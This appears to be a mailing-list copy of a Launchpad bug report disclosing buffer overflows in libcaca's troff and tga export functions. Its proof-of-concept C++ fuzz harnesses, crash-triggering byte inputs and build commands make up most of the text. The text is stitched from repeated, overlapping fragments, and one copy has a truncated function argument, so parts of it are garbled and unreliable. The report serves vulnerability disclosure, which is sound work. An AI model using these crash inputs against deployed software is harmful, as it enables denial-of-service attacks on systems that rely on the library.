apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ 
caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow
Debian 10 libcaca0/now 0.9.beta19-2.1 Fedora 33 Name: libcaca version : 0.99 Release :0.51.beta19.fc33 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: libcaca buffer-overflow Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); 
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g
[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow
source code ## Affected Product Code Base libcaca, 0.99.beta20 Ubuntu 20.04 libcaca 0.99.beta19 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: libcaca buffer-overflow Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I used libFuzzer to test the libcaca API and found two crashes: - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component: libcaca.so ## Affected source code file affected source code file (as call stack): -> caca_export_canvas_to_memory() in libcaca/caca/codec/export.c -> caca_export_memory() in libcaca/caca/codec/export.c -> export_tga() in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1. Get the source code of libcaca: 2. Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3. Run POC.sh to compile poc_troff.cc and poc_tga.cc 4. Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); 
} void* reData = caca_export_canvas_to_memory(cv,"troff",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_tga.cc -O2